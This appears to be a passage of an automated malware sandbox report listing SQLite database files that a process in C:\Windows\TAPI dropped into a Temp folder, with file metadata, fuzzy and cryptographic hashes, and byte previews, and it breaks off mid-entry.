                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\OPw8iJW1ng

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Oh8mkIamVz

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\OtQ3CWAHNR

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Otu2cJndWP

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\OxDxNsacPl

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\P1ES05FEyv

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114688
                                                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\PAxDACelN9

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\POH4ABvE7d

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Q5HQfjDtCx

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\QDpHiqKlJ4

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5707520969659783
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\QFKl7E6xEi

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\QQfw1bpbuT

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\QhpieynJW8

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\R8vW7KpVvK

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.5712781801655107
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\RDQLAGvDfe

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\RRjvYMokI7

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\RVnuqQIULS

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\S9URXb74ar

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\SJYPkMlurT

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\SvqOlfnSW5

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\SxQbKWc1D1

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):126976
                                                                                                                                                                        Entropy (8bit):0.47147045728725767
